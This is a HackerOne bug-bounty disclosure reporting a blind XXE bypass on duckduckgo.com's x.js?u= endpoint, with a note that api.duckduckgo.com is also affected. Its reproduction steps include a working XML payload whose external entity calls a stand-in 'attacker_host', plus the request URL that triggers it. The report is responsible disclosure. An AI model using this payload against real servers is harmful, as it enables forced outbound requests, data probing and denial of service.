DuckDuckGo: Partial bypass of #483774 with Blind XXE on https://duckduckgo.com

2019-01-26T19:30:34
ID H1:486732
Type hackerone
Reporter mik317
Modified 2019-02-25T16:42:25

Description

Summary: Hi DuckDuckGo team, I've contacted previously you because in a second time (on the #483774 report), I've seen that was possible bypass the fix. Anyway, I've not got any response, and because I think that this is a bit dangerous issue, I'm opening another report for the bypass. Hope you'll agree.

Steps for reproduction: 1. Attacker creates a public server and hosts a file with the following content:

xml <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext; ]> <r></r> 2. User goes on https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xml 3. The http://attacker_host/Blind_xxe resource will be requested by an host {F413045}

I'd like to say that this affects not only duckduckgo.com, but also api.duckduckgo.com. Anyway, the #483908 report is still in the triaged state, so I think that will not be right against you submit another report also for the api.duckduckgo.com domain.

Impact

Blind XXE leads to dos and blind injection.